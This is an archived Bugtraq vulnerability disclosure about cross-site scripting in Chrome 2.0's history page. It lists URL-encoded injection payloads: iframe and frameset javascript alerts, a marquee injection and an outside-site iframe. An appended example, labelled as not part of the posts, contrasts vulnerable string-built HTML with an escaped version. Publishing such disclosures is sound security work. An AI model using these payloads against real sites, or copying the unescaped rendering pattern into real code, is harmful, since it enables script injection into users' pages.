Date: Tue, 28 Jul 2009 17:01:02 +0530
From: Karn Ganeshen <karnganeshen@...il.com>
To: bugtraq@...urityfocus.com
Subject: Fwd: cross site scripting the browser google "chrome"

v2.0.172.37

chrome%3A%2F%2Fhistory%2F%23q%3D%22%3E%3CIFRAME%20SRC%3D%22javascript%3Aalert('XSS')%3B%22%3E%3C%2FIFRAME%3E

chrome%3A%2F%2Fhistory%2F%23q%3D%22%3E%3CFRAMESET%3E%3CFRAME%20SRC%3D%22javascript%3Aalert('XSS')%3B%22%3E%3C%2FFRAMESET%3E

Best Regards,
Karn Ganeshen


---------- Forwarded message ----------
From: biko linux <bikolinux@...il.com>
Date: Tue, Jul 28, 2009 at 1:03 AM
Subject: cross site scripting the browser google "chrome"
To: bugtraq@...urityfocus.com


Author:         bikolinux
Vuln:           cross site scripting the browser google "chrome"
Download:       http://www.google.com/chrome
Error:          local
Email:          MSG@...OLINUX.NET bikolinux@...il.com
Version tested: 2.0.172.37
#######################################################################################
cross site scripting the browser google "chrome"
The error is when making a request to record
#######################################################################################
path = chrome://history/
path = view-source:chrome://history/

The error is in the form

EXAMPLE
chrome://history/#q=%22%3E%3Cmarquee%3E%3Ch1%3Ebikolinux%3C%2Fh1%3E%3C%2Fmarquee%3E
view-source:chrome://history/#q="><marquee><h1>bikolinux</h1></marquee>
chrome://history/#q=%22'%3E%3Ciframe%20src%3D%22http%3A%2F%2Fmalandrines.Net%22%20height%3D%221024%22%20width%3D%22800%22%3E%3C%2Fiframe%3E



--
bikolinux allowed
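
Added example, not part of either post and not Chrome's code: the payloads above open with `">`, which is consistent with the `q` fragment value being written into an attribute of the search form without encoding. The sketch below assumes that pattern (the markup and the names `renderUnsafe`, `renderSafe` and `tagNames` are hypothetical) and shows the output-encoding fix against the marquee sample from the post.

```javascript
// Constructed illustration: markup and function names are hypothetical,
// not taken from Chrome's source. SAMPLE is the marquee URL from the post.
const SAMPLE =
  'chrome://history/#q=%22%3E%3Cmarquee%3E%3Ch1%3Ebikolinux%3C%2Fh1%3E%3C%2Fmarquee%3E';

// Pull the percent-decoded "q" value out of the URL fragment.
// URLSearchParams tolerates malformed %-sequences instead of throwing.
function queryFromUrl(url) {
  const hashAt = url.indexOf('#');
  if (hashAt === -1) return '';
  return new URLSearchParams(url.slice(hashAt + 1)).get('q') || '';
}

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode every character that can close an attribute or open a tag.
function escapeHtml(text) {
  return text.replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Assumed vulnerable pattern: the decoded term is concatenated into markup.
function renderUnsafe(term) {
  return '<input name="q" value="' + term + '"><p>Results for ' + term + '</p>';
}

// Hardened form: same markup, term encoded for HTML before insertion.
function renderSafe(term) {
  const t = escapeHtml(term);
  return '<input name="q" value="' + t + '"><p>Results for ' + t + '</p>';
}

// Rough check: list the element names that would be opened by the markup.
function tagNames(html) {
  return [...html.matchAll(/<([a-z][a-z0-9]*)/gi)].map((m) => m[1].toLowerCase());
}

const term = queryFromUrl(SAMPLE);
console.log(tagNames(renderUnsafe(term))); // injected elements appear
console.log(tagNames(renderSafe(term)));   // only the page's own elements
```

In a browser page, setting `input.value` and `textContent` through the DOM avoids building HTML strings at all and is preferable to manual escaping.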
